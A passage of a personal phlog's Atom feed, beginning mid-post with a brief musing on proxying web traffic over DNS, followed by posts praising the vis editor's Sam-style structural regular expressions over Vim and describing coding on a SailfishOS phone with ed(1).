external server, and responded via DNS replies !

It could work i  theory, but has 2 major downsides: first, it would be
horribly slow. The DNS payload is limited to something like 512 bytes,
so that means fragmenting your traffic so it fits in a DNS request.
Same for replies.
The second drawback is that it generates a lot of DNS traffic,
potentially marking you as an attacker in the network you're trying to
bypass, which could lead to problems.

I though it was a fun idea to explore, and I wonder if such a proxying
method has been tested already ?

Having such a DNS web proxy in your toolbox could be pretty helpful
from time to time !
--
~wgs
20200926.1342]]></content>

              </entry>
<entry>

              <title><![CDATA[Vis: Vim Improved, on Steroids]]></title>

              <id>gopher://phlog.z3bra.org/0/vis-vim-improved-on-steroids.txt</id>

              <link href="gopher://phlog.z3bra.org/0/vis-vim-improved-on-steroids.txt" />

              <updated>2023-07-07T01:15:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                       Vis: Vim Improved, on Steroids
──────────────────────────────────────────────────────────────────────

Ok it's a clickbait. But hey, you might as well keep reading now!

I've been using vis[0] as my main editor for a few years now, and
decided to make this post to bring attention onto it.
But first, let's have some context.

Vim
===

I've been using Vim for a very long time (prior to may 2013, according
to git). During this time, I went through most of the phases of a good
Vim fanboy:

- ^C^C^C^Cquit^Mend^Mexit^M*reboot*
- Using normal mode just for HJKL
- Use HJKL in Every. Single. Application.
- Join the crusades against Emacs
- Changing my .vimrc every 5 second
- Read the Arabesque blog[1] a 1000 times
- Have 34792492 plugins, with 5 different plugin managers
- Have 0 plugin because THIS IS TRUE VIM
- rm ~/.vimrc because THIS IS TRUE VIM
- Play vimgolf all day
- …

But after some time of being a happy little Vim user, I fell into the
Plan9 trap.

Acme, Sam, Wily!

Three editors centered around the mouse, just as I conviced myself that
I didn't need a mouse, and that keyboard-centric interfaces are the
future, a cute little thing named Glenda[2] brought me down her rabbit
hole...

I used Vim for so long at this point that I didn't see myself changing
editor, but it still got me curious: what is so powerful about these
editors, that so many people praise them ?

I've read many papers, blogs, whatched videos to learn about Acme and
Sam and their strength. That's where I learnt about Sam's Structural
Regular Expressions:

https://doc.cat-v.org/bell_labs/structural_regexps/se.pdf

I kept reading about Sam, and it made me realize Vim's greatest
weakness:

It deals with lines of text.

This does not seem like a big deal, but it makes a huge difference!
Imagine the following code:

       int foo = 0;
       foo = random() % 16;
       if (foo > 7) {
               foo = do_stuff(foo)
       }
       return foo;

Now assume we want to change a few things:

0. rename "foo" to "bar"
1. remove the useless "= 0"
2. add the missing ; on line 4

How would we do these with Vim commands ?

0. :%s/foo/bar/g
1. :1s/ = 0// (or "ggt=dt;")
2. :4s/$/;/ (or "4GA;<ESC>")

Do you notice the pattern ? Even though Vim has :change, :delete and
:append/:insert commands, we used :substitute for all of them!  Think
about it the next time you use Vim. The substitute command is used 90%
of the time when using commands.

Here's how you'd do it with Sam now:

0. x/foo/ c/bar/
1. 1x/ = 0/ d
2. 4x/$/ a/;/

The x command eXtracts the selected text and runs a command on it, for
each selection separately. This is a very powerful concept, as it lets
you manipulate the text as a whole, rather than only interacting with
it one line at a time. The sam language has even more powerful features
which are described in its tutorial:

http://doc.cat-v.org/bell_labs/sam_lang_tutorial/sam_tut.pdf

Unfortunately for me, and even though Sam has a very powerful command
language, navigating the file is done exclusively with the mouse. And
I could just not give up on the muscle memory I built over all these
years of using Vim.


So what were my options ? Going back to Vim, after seing the greener
side of the grass ? Give up on Vim, and the power of modal editing ?

Vis
===

There was a third option of course: Vis !

When I first found about it, vis was a small project seeking to provide
"90% of the features of Vim, in 10% of the code". This was immediately
appealing to me, and I immediately tried it. It had rough edges, and I
missed a few features, but it was clean and fast.

Then the project became more mature, and a new feature appeared: The
Sam language was implemented into it. I was thrilled!

Vis combines the strength of both Vim and Sam into what I believe is
the ultimate text editor. Selections (or DOT) benefits from Vim "visual"
mode, allowing one to edit different portions of the file at the same
time, with multiple cursors.

And to put the icing on the cake, you can write plugins for it using
Lua.

Whether you're a plan9 fan looking for a good Sam implementation, or an
avid Vim user, I urge you to try it, and embrace the other side of the
text editing that you're going to learn.

Acme
====

Of course, I could not end this post without talking about Acme[3],
which I believe is the next step of editing evolution. I'm however too
scared to really commit to it, and buy a 3 buttons mouse for this sole
purpose (but I know I will, someday).

However, there is a middleground: Edit[4]! This project has not been
updated in a long time, but looks like a marvelous concept that I would
like to explore in the future.

Maybe the next (last?) step is Vim + Sam + Acme ?
--
~wgs

[0]: https://github.com/martanne/vis
[1]: https://blog.sanctum.geek.nz/category/vim
[2]: http://glenda.cat-v.org
[3]: http://acme.cat-v.org
[4]: https://c9x.me/edit

20230707.0115]]></content>

              </entry>
<entry>

              <title><![CDATA[Write code on a phone]]></title>

              <id>gopher://phlog.z3bra.org/0/write-code-on-a-phone.txt</id>

              <link href="gopher://phlog.z3bra.org/0/write-code-on-a-phone.txt" />

              <updated>2020-09-14T16:11:00+02:00</updated>

              <author><name>wgs</name></author>

              <content type="text"><![CDATA[                                                Write code on a phone
──────────────────────────────────────────────────────────────────────

I recently injured my wrist. Not sure if it's because of my recent
intensive climbing session, or coding session, but it sure hurts a lot
to type on a keyboard now !

I have a bunch of cool projects going on though, so I had to find a way
to keep coding without adding more tension to my wrist. And I found a
« solution » :

My phone.

In portait mode, the keyboard is small enough that I don't have to move
my thumb much, so my wrist stay cool about it. And as I run a full
Linux (SailfishOS [0]), I benefit from all the bells and wistles you
get on linux, like vi, git, make, ssh, rsync, ...

The default terminal, however, is a piece of shit when it comes to
curses interfaces, because it uses a drop-down screen over the
keyboard. So when you type, the screen move up to show the keyboard,
and you can't see the top of the window anymore, which usually where
your cursor is in the vi editor.

Here too, I found a « solution » : ed(1).

And to be honest, now that I got used to it, I prefer doing line-based
editing on the phone rather than a full screen editor. The space is
scarce on-screen, and I usually edit stuff over 3G links, so ed(1)
performs better in both cases !

So here I am:
- Injured.
- Coding on a phone.
- Using ed(1).

I fell like a sadomasochist. Except the goal is to feel LESS pain.

There is one /real/ benefit to code on your phone though. When you take
a shit, and find a solution to your problem, you can try it right away
! 😉
--
~wgs

[0]: https://sailfishos.org

20200914.1611]]></content>

              </entry>
</feed>